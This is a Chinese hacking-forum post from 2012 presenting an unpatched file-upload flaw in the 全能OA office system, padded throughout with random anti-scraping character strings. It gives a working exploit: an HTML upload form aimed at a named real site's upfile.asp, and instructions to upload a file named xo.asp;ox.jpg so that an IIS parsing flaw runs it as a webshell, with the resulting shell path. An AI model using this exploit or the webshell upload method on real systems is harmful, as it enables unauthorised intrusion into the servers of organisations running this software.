找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2274|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
! e8 t5 C6 X8 S/ W/ Y2 x4 J3 K4 e* H! H
系统介绍:
9 D0 G1 t3 D4 `1 M
  _5 P! L, B5 U, l0 C全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
& H  f& b) X6 A# `/ |+ B3 h' f; k$ B7 U5 `2 t
主要功能:2 {9 x1 j2 u. O) T% r5 W4 j
公司通告
0 F8 t# n9 V# O9 J* \% s工作计划
: }" b( S+ Y! [- [! O' F- m( v通讯助理 : P& ]9 @4 Y" O; @; C
客户资源
7 J3 Y3 A8 i% _7 Y5 r& L我的公文 . C2 i( w4 d) Z( {
公文传阅
6 F1 S( ~5 \/ V$ ^+ _# C% |6 N  e公共资源
1 F/ a  U3 Y4 G, _) T) H8 B资源预约
1 y/ ?; @5 V% ~) J今日考勤 # D1 |" x( s" C
个人计划
: o: Z; I* A/ t) k个人通讯录 / s1 d; Y6 e% R, ^  \
个人基本档案
8 ]& s) \' g0 w. w; @- s9 G0 s, M未读邮件 * {$ }0 I$ S: ?# E
发邮件 * f! v4 U9 `. s, b0 Y
收件夹
2 T- O7 |- `  q  O& \7 p寄件夹 % z, t, t2 l! i: p/ v
网络硬盘 / v& W: _( i: `4 c) Z
网络会议 ; Q7 Y- k/ J* I6 f7 t) F4 v
网络调查 ! i# q5 k2 ~1 X
交流论坛
$ t5 F, B9 i- j8 ?; i8 b( S/ P* V/ |) V
有兴趣测试的朋友可以下源码看看% b8 V5 v$ n' ]5 Q7 r5 u( ^% u7 b( b' E

; s0 W- R; S# c+ Z% [源码下载:/ ^$ U; x6 W& S. t
) @, g. N! ~) b; p; q: J5 m
http://www.mycodes.net/30/4750.htm
7 Z! \: F- }" z8 v( _
# F! G, Z* ~/ `1 M" r7 r2 j8 H" f漏洞介绍:
' m# m+ g0 ^0 s# z) K
/ z: {% W! X% c0 w: P+ Q由upfile.asp上传文件漏洞引起
, o0 N) Q( `1 u. y7 D- ~+ y3 r' v) W: a+ l
测试方法:2 _" y# @4 F! J# k/ Z' u

, W; y7 u8 b0 J( t. N  v7 H使用名小子上传http://www.itlynn.com/upfile.asp即可
0 z1 Y1 z) k) R! s! S2 T+ P7 r4 G, A
如果upfile.asp文件被删除不存在。$ F- I  ~8 c! m' [' d: i+ V7 F
" L0 O" H; C' q: Z1 X; X% ?' ~
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp: w+ x* f/ o7 ~; n; `/ W" M6 g

& s' D' O( Z2 B+ s8 E$ Z& }如果存在那么将如下代码保存为upfile.html。1 a2 Z) C9 T, g5 D9 R
, \; G2 h' V/ f! ]5 t* n
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp) i) C/ I  f! o- S- V
3 r6 i$ O9 Z9 A6 w( C% j3 P
4 ?2 l: i7 Y- C- g

3 j9 A* S: S) }- z) g01 <table border='0' align="center" cellpadding="5"> . v1 D. @$ i" E& n/ D: C/ O

4 R$ g; b% S% W' t02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
7 C# k& [+ A" H  e& y9 g" a1 r
/ v3 a' n4 X6 B4 D) C. @03 <tr> 7 h5 d8 b/ f! w& b

. G9 s& t! _7 y6 [2 z04             <td>报错:</td>
' n$ S8 t0 x" [# `' L# b9 D. A& d! f6 F9 }) `$ d
05             <td><input type='radio' name='errnumber' value='0'> + i. a1 N$ @; {5 w1 }' ?
% @) `6 c' ]8 X" e9 `1 ^8 Q8 L9 f) e
06               自动更名 ( d+ Z$ h6 m- E$ }% T
$ v, t8 l$ Z3 @9 W! i
07               <input type='radio' name='errnumber' value='1' checked> ( d$ O- y' @) v9 V

) {& t. E# B* x2 T5 T) G( y) |+ V08               报错方式
' N0 X. _( H% c: ]0 x  f7 W9 I* F6 S9 h
09               <input type='radio' name='errnumber' value='2'>
$ X: m4 a5 z5 Z4 z  F
% l2 V1 g2 C& W  H0 Z0 j10               直接覆盖</td>
/ K3 j; @9 Q3 N4 q+ }* J4 u7 Q4 I% t
11           </tr>
1 P+ q! l; m( K- I
' P7 N$ m7 R' ^( B/ K" N12           <tr>
* K: d1 p% E( Y* ~9 Q
( f2 |5 H' C9 r5 g6 h13             <td>主题:</td> : b1 _+ Q  v6 l/ v4 M' L3 N

: t2 X4 O. [- T. x# U, x; G14             <td><input type='text' name='filename' size='30'></td>
/ Z* C! O# {* a5 K" e9 ~- o# T2 P
15           </tr> ! e' e1 P" m- S; ^( O+ s* U" H

; A8 [* T! K) S5 _7 C16           <tr>
+ R0 R: b% m; u6 v+ F9 }. W# h8 v; |, R; w2 m
17             <td>文件:</td> & P: C4 a- C/ ]7 T

% z' ^. Y' u" z( X9 y18             <td><input type="file"name="fruit"size="30"></td>
- g  e: o$ ^( `! H! H, Z: P* l8 I, g& p/ t1 G4 Y& x8 u
19           </tr> 3 a. ]1 g3 e3 K* t  Y+ A

7 X9 f1 a+ l. G5 O7 s# c) [20           <tr> ; v% B' G( w! _7 r
3 M# f# Q7 |: [; B. e) x
21             <td valign='top'>简介:</td> 2 y. F0 ?( d% e4 l6 q3 B9 Y
1 B" ], g! B# T* d$ R7 [& n1 o. u
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
+ R. P" S7 A/ a" B- g9 @' }: ]" n& m3 r1 D! r
23           </tr> . Q) s) Q2 l3 G- L: `  N. X% N
0 ]2 K+ |( o" k' r6 U* k- {3 b
24   , w  v+ H7 L6 @" t' H) u6 c

, _7 B2 l8 b+ ?3 m& i) s1 D, p  f25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
) p! g2 U. Z: L$ |2 f7 A* A9 x, N: A7 O' R: p8 n8 Q; a
26           </tr>
9 d% K# B6 I. K( h/ P8 S
- v( [( n9 `/ q( M9 _$ G+ D+ N27         </form> 8 i' A( C* X) t: ]- Q5 A

+ ]1 F$ H& |* Z# ]3 v0 j7 k! u! x然后打开上传一个文件名为xo.asp;ox.jpg的文件。( G0 Q- m+ M; R
/ @. G( _2 S" s% z) Z  P- s3 |

: |' P$ \% \* \0 e5 \: P# ]- a6 s  b0 u. D: `1 p
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg9 P0 k5 n4 t- H6 B  P8 h  W
, A  E2 ~( s9 p( F
此漏洞需要配合解析漏洞利用。1 D# N8 y, C. A- e2 {

: }. k* U: S2 y+ D$ R* S# c0 p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表